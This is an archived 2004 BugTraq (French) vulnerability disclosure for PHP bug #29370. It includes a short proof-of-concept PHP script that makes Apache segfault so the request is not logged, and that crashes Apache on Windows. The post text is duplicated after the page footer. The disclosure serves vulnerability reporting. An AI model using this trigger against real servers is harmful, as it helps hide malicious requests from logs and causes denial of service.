Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq in French
Back to list
|
Post reply
[PHP Bug] Comment cacher une requête HTTP dans les logs apache
Aug 06 2004 11:16PM
Anthony Debhian (anthony debhian only-for info)
Auteur: Debhian ( anthony.debhian -AT- only-for.info )
PHP Bug #29370
Description:
Avec un certain code, php cause un segfault dans apache, et la requête n'est pas logguée.
Le bug (sous windows) cause une erreur fatale d'apache mais le serveur n'est pas stoppé avec le code.
Le bug semble fonctionner sur toutes les configurations (php4 / php5 && windows / unix)
Systèmes testés:
Windows / Apache 1.3.31 / PHP 5.0.0
Windows / Apache 1.3.27 / PHP 4.3.3
Linux / Apache 1.3.24 / PHP 4.2.1
Code d'exemple:
<?
/*
Cet page ne sera pas loggué par apache, et fera segfault apache sous windows.
*/
function funcfunc($array,$space="")
{
foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
return $src;
}
function funcfunc2($array,$test)
{
foreach($array['test'] as $key=>$value) { }
return $array;
}
$test['debhy']['debhou']="test1";
$test['debhian']['debh']="test2";
$array=funcfunc($test);
$array=funcfunc2($array,"test");
?>
Solution:
Il y'a + de 2 semaines que PHP à été informé, aucune réponse n'a été donnée.
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Auteur: Debhian ( anthony.debhian -AT- only-for.info )
PHP Bug #29370
Description:
Avec un certain code, php cause un segfault dans apache, et la requête n'est pas logguée.
Le bug (sous windows) cause une erreur fatale d'apache mais le serveur n'est pas stoppé avec le code.
Le bug semble fonctionner sur toutes les configurations (php4 / php5 && windows / unix)
Systèmes testés:
Windows / Apache 1.3.31 / PHP 5.0.0
Windows / Apache 1.3.27 / PHP 4.3.3
Linux / Apache 1.3.24 / PHP 4.2.1
Code d'exemple:
<?
/*
Cet page ne sera pas loggué par apache, et fera segfault apache sous windows.
*/
function funcfunc($array,$space="")
{
foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
return $src;
}
function funcfunc2($array,$test)
{
foreach($array['test'] as $key=>$value) { }
return $array;
}
$test['debhy']['debhou']="test1";
$test['debhian']['debh']="test2";
$array=funcfunc($test);
$array=funcfunc2($array,"test");
?>
Solution:
Il y'a + de 2 semaines que PHP à été informé, aucune réponse n'a été donnée.
[ reply ]